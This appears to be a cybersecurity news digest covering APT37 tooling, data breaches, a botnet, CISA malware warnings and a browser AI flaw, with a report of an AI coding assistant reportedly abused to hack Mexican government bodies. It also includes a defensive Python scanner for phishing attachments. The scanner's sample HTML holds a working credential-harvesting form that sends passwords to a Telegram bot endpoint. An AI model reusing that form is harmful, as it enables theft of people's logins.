North Korean hackers are deploying newly uncovered tools to move data between internet-connected and air-gapped systems, spread via removable drives, and conduct covert surveillance. The malicious campaign has been named Ruby Jumper and is attributed to the state-backed group APT37, also known as ScarCruft, Ricochet Chollima, and InkySquid. Air-gapped computers are disconnected from external networks, especially the public internet. READ MORE...
More than 38 million accounts were affected by an October 2025 data breach at Canadian retail giant Canadian Tire. The incident was discovered on October 2 and involved unauthorized access to an e-commerce database, the company said. "The database contained basic personal information for customers who have an e-commerce account with one or more of Canadian Tire, SportChek, Mark's/L'Équipeur and Party City," the retail giant announced in October. READ MORE...
Anthropic's Claude Code assistant has been abused in a cyberattack against the Mexican government's systems, Israeli cybersecurity startup Gambit Security reports. As part of the attack, ten Mexican government bodies and a financial institution were compromised, beginning with the country's tax authority in late December 2025. Mexico City's civil registry and health department, the national electoral institute, local governments in four cities, and a water utility were hacked. READ MORE...
In early January 2026, KrebsOnSecurity revealed how a security researcher disclosed a vulnerability that was used to build Kimwolf, the world's largest and most disruptive botnet. Since then, the person in control of Kimwolf - who goes by the handle "Dort" - has coordinated a barrage of distributed denial-of-service (DDoS), doxing and email flooding attacks against the researcher and this author, and more recently caused a SWAT team to be sent to the researcher's home. READ MORE...
An attachment named New PO 500PCS.pdf.hTM, posing as a purchase order in PDF form, turned out to be something entirely different: a credential-harvesting web page that quietly sent passwords and IP/location data straight to a Telegram bot controlled by an attacker. Imagine you're in accounts payable, sales, or operations. Your day is a steady flow of invoices, purchase orders, and approvals. An email like this may look like just another item in your daily queue. READ MORE...
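The attachment described above relies on two tricks a triage script can test for mechanically: a document-looking name whose real (final) extension is HTML, and an embedded form that posts captured credentials to the Telegram Bot API. The following Python scanner is an added example for this digest, not code from the original report or from any vendor; the sample filename is the one quoted above, the HTML body and bot token are constructed here for illustration, and the function names are our own.

```python
"""Flag e-mail attachments that pose as documents but are really HTML,
and look inside HTML bodies for password forms and Telegram Bot API exfil."""
import re
from dataclasses import dataclass, field

# Final extensions that render or execute client-side (common phishing carriers).
ACTIVE_EXTS = {"htm", "html", "hta", "shtml", "svg", "js", "vbs", "lnk", "exe", "scr"}
# "Decoy" extensions users read as harmless documents or images.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png"}
HTML_EXTS = {"htm", "html", "hta", "shtml"}

# Telegram Bot API calls have the shape api.telegram.org/bot<id>:<secret>/<method>
TELEGRAM_BOT_RE = re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]{20,}/\w+", re.I)
# A password input inside an attachment is a strong credential-harvesting signal.
PASSWORD_FIELD_RE = re.compile(r'type\s*=\s*["\']password["\']', re.I)


@dataclass
class Finding:
    filename: str
    reasons: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def deceptive_extension(filename: str) -> bool:
    """True for name.<decoy>.<active>, e.g. 'New PO 500PCS.pdf.hTM'.
    'report.v2.pdf' is not flagged: the middle part is not a decoy extension."""
    parts = filename.lower().rsplit(".", 2)
    if len(parts) < 3:
        return False
    return parts[-2] in DECOY_EXTS and parts[-1] in ACTIVE_EXTS


def telegram_exfil_targets(content: str) -> list[str]:
    """Return distinct Telegram Bot API endpoints referenced in the content."""
    return sorted({m.group(0) for m in TELEGRAM_BOT_RE.finditer(content)})


def analyze_attachment(filename: str, content: bytes) -> Finding:
    """Combine the filename check with content checks for HTML attachments."""
    finding = Finding(filename)
    if deceptive_extension(filename):
        finding.reasons.append("document decoy with active final extension")
    final_ext = filename.lower().rsplit(".", 1)[-1]
    if final_ext in HTML_EXTS:
        text = content.decode("utf-8", errors="ignore")
        if PASSWORD_FIELD_RE.search(text):
            finding.reasons.append("HTML attachment contains a password field")
        targets = telegram_exfil_targets(text)
        if targets:
            finding.reasons.append("posts to Telegram Bot API: " + ", ".join(targets))
    return finding


# Constructed sample modelled on the lure described in the article.
# The bot token below is fake and exists only to exercise the regex.
SAMPLE_FILENAME = "New PO 500PCS.pdf.hTM"
SAMPLE_HTML = b"""<html><body>
<h3>Sign in to view your purchase order</h3>
<form id="f"><input name="user" type="text"><input name="pw" type="password"></form>
<script>
document.getElementById('f').onsubmit = function (e) {
  e.preventDefault();
  var msg = 'user=' + f.user.value + ' pw=' + f.pw.value;
  fetch('https://api.telegram.org/bot123456789:AAFakeTokenForTesting0000000000/sendMessage'
        + '?chat_id=1&text=' + encodeURIComponent(msg));
};
</script></body></html>"""

# A benign HTML attachment for contrast: no password field, no bot endpoint.
BENIGN_HTML = b"<html><body><p>Monthly newsletter</p></body></html>"


def demo() -> list[Finding]:
    return [
        analyze_attachment(SAMPLE_FILENAME, SAMPLE_HTML),
        analyze_attachment("newsletter.html", BENIGN_HTML),
        analyze_attachment("invoice.pdf", b"%PDF-1.4 ..."),
    ]


if __name__ == "__main__":
    for f in demo():
        print(f.filename, "->", "SUSPICIOUS" if f.suspicious else "ok", f.reasons)
```

The filename check deliberately requires a known decoy extension immediately before the active one, so legitimate versioned names such as `report.v2.pdf` pass; the content checks only run when the final extension is HTML-like, which is where a mail gateway would otherwise see "just a web page" and let it through.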
The Cybersecurity and Infrastructure Security Agency on Thursday warned that a malware variant previously used in attacks against Ivanti Connect Secure environments may remain undetected on systems. In March 2025, CISA issued an alert about the malware, dubbed Resurge, in connection with exploitation of CVE-2025-0282, a stack-based buffer overflow vulnerability in certain versions of Ivanti Connect Secure and other Ivanti products. READ MORE...
With the FIFA World Cup coming to the United States, Canada, and Mexico this year, cybersecurity experts are warning that the risks are rising from rapidly evolving threats such as drones and wireless surveillance. Wireless communications have grown in importance and criticality, with connections to security systems, operational technology (OT), and application connectivity all expanding dramatically over the past decade. READ MORE...
Google has fixed a high-severity flaw in its implementation of Gemini AI in the Chrome browser that could have allowed attackers to escalate privileges, violate user privacy while browsing, and access sensitive system resources. Researchers said that the vulnerability demonstrates new security hazards that come with the deployment and use of agentic browsers that have AI built in. Specifically, the flaw could have allowed malicious browser extensions to escalate privileges. READ MORE...